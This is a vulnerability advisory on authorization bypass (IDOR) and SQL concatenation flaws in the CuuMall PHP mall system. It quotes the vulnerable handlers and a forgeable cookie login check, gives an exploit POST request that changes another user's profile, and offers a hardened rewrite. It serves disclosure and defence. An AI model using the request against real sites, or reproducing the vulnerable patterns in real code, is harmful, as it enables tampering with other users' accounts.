### Summary:
CuuMall free open-source mall system: collection of authorization bypass (IDOR) issues
### Details:
In the CuuMall free open-source mall system, a user can bypass authorization to modify another user's shipping address, personal information, and so on.
Here we take one example, editing personal information. Look straight at the code:
UserInfoAction.class.php (lines 716-735):
```php
public function posteditpro( )
{
    // The uid is taken straight from the POST body; it is never compared
    // with the identity of the logged-in user.
    $uid = $_POST['uid'];
    $data['shen'] = $_POST['shen'];
    $data['shi'] = $_POST['shi'];
    $data['qu'] = $_POST['qu'];
    $data['sex'] = $_POST['sex'];
    $data['realname'] = $_POST['realname'];
    $data['email'] = $_POST['email'];
    $data['more'] = $_POST['more'];
    $data['youbian'] = $_POST['youbian'];
    $data['tel'] = $_POST['tel'];
    $data['mob'] = $_POST['mob'];
    $data['qq'] = $_POST['qq'];
    $data['ww'] = $_POST['ww'];
    $rej = new Model( "m_per" );
    // $uid is concatenated into the WHERE clause as-is: no cast, no escaping.
    $rej->data( $data )->where( "uid=".$uid )->save( );
    $this->assign( "msgTitle", "编辑个人档案成功!" );
    $this->success( "编辑个人档案成功!" );
}
```
Let's see what the permission check relies on.
Same file (lines 28-35):
```php
$co = new Cookie( );
// The "login check" only looks at whether a username and password exist in the cookie.
$username = $co->get( c( "GUESTCOOK" )."mall-m-name" );
$password = $co->get( c( "GUESTCOOK" )."mall-m-pass" );
if ( empty( $username ) || empty( $password ) )
{
    $this->redirect( "home/login" );
    exit( );
}
```
This only uses the username and password stored in the cookie.
Both the username and password here can be fully recovered as plaintext.
Take a look at cookie.class.php:
```php
static function get($name) {
    // base64 + unserialize only: no signature, no encryption, no secret involved.
    $value = $_COOKIE[C('COOKIE_PREFIX').$name];
    $value = unserialize(base64_decode($value));
    return $value;
}
```
There is no secret key of any kind, which means the contents of the cookie are effectively plaintext to us.
Now back to the point: the uid is POSTed by the client, and it is inserted straight into the SQL that updates the table (SQL injection):
`$rej->data( $data )->where( "uid=".$uid )->save( );`
Clearly the only check here is on the uid.
We send the request:
```http
POST /cuumall_v2.3/v2.3/mall_upload/index.php/home/userinfo/posteditpro
postdata:
shen=%E6%B9%96%E5%8C%97&shi=%E8%8D%86%E5%B7%9E%E5%B8%82&qu=%E6%B2%99%E5%B8%82%E5%8C%BA&uid=5&realname=&email=test%401.com&more=xddd&youbian=xxx&tel=xxxxx&mob=xxxxxxx&qq=xxxxxxxxxxxxx&ww=xxxxxxxxxxxxxx&imageField.x=93&imageField.y=17&__hash__=f543cb0871b243508a543f0b18b91026
```
Looking at the username in the cookie, it decodes to `test`; yet with uid=5 we directly change the profile of user `test2`.
![18.png](https://images.seebug.org/upload/201409/301558312a34cafae3363950fb5b3c9fd40839a1.png)
It has been modified here.
Let's look at another place, still in the same file:
```php
public function postchgrejpro( )
{
    // The address row id comes from the client and is never checked against
    // the logged-in user, so any address row can be overwritten.
    $id = $_POST['id'];
    $data['shen'] = $_POST['shen'];
    $data['shi'] = $_POST['shi'];
    $data['qu'] = $_POST['qu'];
    $data['more'] = $_POST['more'];
    $data['youbian'] = $_POST['youbian'];
    $data['rejname'] = $_POST['rejname'];
    $data['mob'] = $_POST['mob'];
    $data['tel'] = $_POST['tel'];
    $data['email'] = $_POST['email'];
    $data['qq'] = $_POST['qq'];
    $data['ww'] = $_POST['ww'];
    $rej = new Model( "m_rejpro" );
    // Same pattern: raw string concatenation into the WHERE clause.
    $rej->data( $data )->where( "id=".$id )->save( );
    $this->assign( "waitSecond", 3 );
    $this->assign( "jumpUrl", "__APP__/home/userinfo/rejpru" );
    $this->assign( "msgTitle", "收货地址编辑成功" );
    $this->success( "收货地址编辑成功!" );
}
```
The principle is the same as the previous one, so I won't go into detail.
There should be many other places as well: anywhere the uid alone is used for validation is open to unauthorized operations.
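As an added example, not part of this report and not CuuMall's own code, here is how both handlers above could be rewritten so the identity comes from the server-side session instead of the request body, the writable fields are whitelisted, and the address row is checked for ownership. It assumes a ThinkPHP 3-style `Model` whose `where()` accepts an array (values escaped/bound by the framework), a `session()` helper holding the uid set at login, `$this->error()` on the action base class, and a `uid` column on `m_rejpro`; none of these have been verified against CuuMall.

```php
<?php
// Hardened posteditpro / postchgrejpro (added example, not CuuMall's code).
// Assumptions: login stores the authenticated user's id in the server-side session
// as 'uid' (read via the session() helper); Model::where() accepts an array and
// binds/escapes its values; m_rejpro has a uid column linking an address to its owner.
class UserInfoAction extends Action
{
    // Identity comes from the session, never from the POST body.
    private function currentUid()
    {
        $uid = intval(session('uid'));   // 0 when not logged in
        if ($uid <= 0) { $this->redirect("home/login"); exit(); }
        return $uid;
    }

    // Copy only whitelisted keys out of $_POST; 'uid' and 'id' are never writable.
    private function pickFields(array $allowed)
    {
        $out = array();
        foreach ($allowed as $f) {
            if (isset($_POST[$f])) { $out[$f] = $_POST[$f]; }
        }
        return $out;
    }

    public function posteditpro()
    {
        $uid  = $this->currentUid();
        $data = $this->pickFields(array('shen', 'shi', 'qu', 'sex', 'realname', 'email',
                                        'more', 'youbian', 'tel', 'mob', 'qq', 'ww'));
        // Array condition: uid is an integer bound by the framework, no concatenation.
        $per = new Model("m_per");
        $per->data($data)->where(array('uid' => $uid))->save();
        $this->success("编辑个人档案成功!");
    }

    public function postchgrejpro()
    {
        $uid  = $this->currentUid();
        $id   = intval($_POST['id']);
        $data = $this->pickFields(array('shen', 'shi', 'qu', 'more', 'youbian', 'rejname',
                                        'mob', 'tel', 'email', 'qq', 'ww'));
        // Ownership check: the row must belong to the caller. An id owned by another
        // user matches nothing, so save() affects 0 rows and the record is untouched.
        $rej = new Model("m_rejpro");
        $n = $rej->data($data)->where(array('id' => $id, 'uid' => $uid))->save();
        if (!$n) { $this->error("Address not found or not owned by you"); return; }
        $this->success("收货地址编辑成功!");
    }
}
```

The cookie-based "login check" shown earlier should likewise be replaced by a server-side session so that the client never holds a forgeable username/password pair.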
### Proof of vulnerability: